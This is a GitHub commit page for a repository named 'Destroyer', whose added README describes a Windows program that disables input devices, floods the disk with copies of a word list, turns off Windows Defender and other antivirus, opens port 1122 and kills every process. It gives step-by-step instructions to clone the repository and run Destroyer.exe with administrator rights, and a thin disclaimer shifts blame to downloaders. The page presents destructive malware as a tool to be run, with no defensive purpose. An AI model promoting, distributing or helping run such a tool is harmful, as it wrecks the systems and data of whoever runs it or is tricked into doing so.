Skip to content

Commit

Permalink
v0.0.1
Browse files Browse the repository at this point in the history
  • Loading branch information
INeddHelp committed Mar 25, 2023
1 parent 688b277 commit 22c8966
Show file tree
Hide file tree
Showing 5 changed files with 61 additions and 0 deletions.
2 changes: 2 additions & 0 deletions CODE_OF_CONDUCT.md
Original file line number Diff line number Diff line change
Expand Up @@ -126,3 +126,5 @@ enforcement ladder](https://github.com/mozilla/diversity).
For answers to common questions about this code of conduct, see the FAQ at
https://www.contributor-covenant.org/faq. Translations are available at
https://www.contributor-covenant.org/translations.

LTS version: v0.0.1
2 changes: 2 additions & 0 deletions CONTRIBUTING.md
Original file line number Diff line number Diff line change
Expand Up @@ -28,3 +28,5 @@ This project follows the Contributor Covenant Code of Conduct. By participating

License
This project is released under the GNU General Public License v3.0. By contributing to this project, you agree that your contributions will be licensed under this license. A copy of the license can be found in the LICENSE file.

LTS version: v0.0.1
53 changes: 53 additions & 0 deletions README.md
Original file line number Diff line number Diff line change
@@ -1 +1,54 @@
# Destroyer

## What is it?

Destroyer is a programm which:
- Temporarily disables all of the mices and keyboards connected to your pc
- It opens ShutNet [You can download it here](https://github.com/INeddHelp/ShutNet)
- Duplicates over and over again the file words_alpha.txt download from [here](https://github.com/dwyl/english-words)
- Turns into a toast the Windows defender and every other anti-virus programs on Windows
- Opens the port 1122
- Terminates every process on the pc

## How can I use it?

### How to check if you have git installed
- Open the terminal
- - Run
```
git --version
```
If it prints out an error, go [here](https://github.com/INeddHelp/Destroyer#if-you-do-not-have-git-installed)
else, go [here](https://github.com/INeddHelp/Destroyer#if-you-have-git-installed)

### If you do not have git installed

- Download git from [here](https://git-scm.com/download/win)
- Open the terminal
- Navigate to the Downloads
```
cd Downloads
```
- and run this last command
```
name-of-the-file-download.exe /SILENT
```
After the installation is completed, go [here](https://github.com/INeddHelp/Destroyer#if-you-have-git-installed)

### If you have git installed

- Open the terminal
- Navigate to the desktop
```
cd Desktop
```
- Type in
```
git clone https://github.com/INeddHelp/Destroyer.git
```
- After that's done, open the downloaded folder and seek the file Destroyer.exe
- - Right click on it and run it with administrative privilages

Enjoy!

P.S. THIS PROGRAM IS NOT MEANT TO DAMAGE ANY DEVICE. YOU IT WITH CAUSION.
2 changes: 2 additions & 0 deletions SECURITY.md
Original file line number Diff line number Diff line change
Expand Up @@ -2,3 +2,5 @@

The files published were not meant for malicious reasons.
The liable for any damage is the person who downloaded the files shared in the repository.

LTS version: v0.0.1
2 changes: 2 additions & 0 deletions debug.txt
Original file line number Diff line number Diff line change
Expand Up @@ -109,3 +109,5 @@ No Instance(s) Available.
No Instance(s) Available.
No Instance(s) Available.
No Instance(s) Available.

LTS version: v0.0.1

0 comments on commit 22c8966

Please sign in to comment.